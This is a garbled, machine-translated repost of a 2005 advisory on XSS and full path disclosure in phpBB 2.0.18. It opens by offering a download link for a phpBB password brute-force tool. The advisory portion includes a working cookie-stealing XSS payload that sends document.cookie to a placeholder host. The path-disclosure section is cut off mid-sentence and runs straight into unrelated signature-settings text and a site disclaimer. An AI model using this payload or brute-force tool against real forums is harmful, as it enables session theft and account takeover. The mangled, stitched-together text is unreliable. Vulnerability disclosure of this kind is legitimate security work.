There is a brute force to break the tool, single-threaded, there is no great use, really rival opened a phpBB what can also be used to run the password
Download: Http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar
Topic:phpbb 2.0.18 XSS and full Path disclosure
Securityalert id:269
Securityrisk:low
Remote Exploit:yes
Local Exploit:no
Exploit Given:yes
Credit:maksymilian Arciemowicz
date:17.12.2005
Affected Software:phpbb <= 2.0.18
Advisory Text:
-----BEGIN PGP Signed Message-----
Hash:sha1
[PhpBB 2.0.18 XSS and full Path disclosure cxib8o3.22]
Author:maksymilian Arciemowicz (CXIB8O3)
date:16.12.2005
From the Securityreason.com team
----0.Description---
PhpBB is a high powered, fully scalable, and highly customizable Open Source Bulletin Boar
D package. PhpBB has a user-friendly interface, simple and straightforward administration
Panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, Ms-sql, PostgreSQL or ACCESS/ODBC database servers, PhpBB is the ideal free community
Lution for the all Web sites.
Contact with author Http://www.phpbb.com/about.php.
----1. XSS---
If in phpBB is allowed HTML tags ' on ' like B,i,u,pre and have your in profile ' Always al
Low Html:yes "or are to you Guest
That's the can use this tags:
<b c= ">" onmouseover= "alert (' securityreason.com ')" x= "<b" > H E L O </B>
Exploit:
<b c= ">" onmouseover= "alert (document.location= ' http://HOST/cookies? ') +document.cookie)
"x=" <b "> H A L O </B>
and have you cookies.
----2. Full Path Disclosure---
In the file admin/admin_disallow.php is
Oh, yes, the top one looks like maybe I guess that's what it means:
Personality Signature:
The personalized signature you fill out is automatically attached at the bottom of your published article. A personality signature has a limit of 512 characters.
Prohibit HTML tags
Allow style labels
Allow expression icons
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.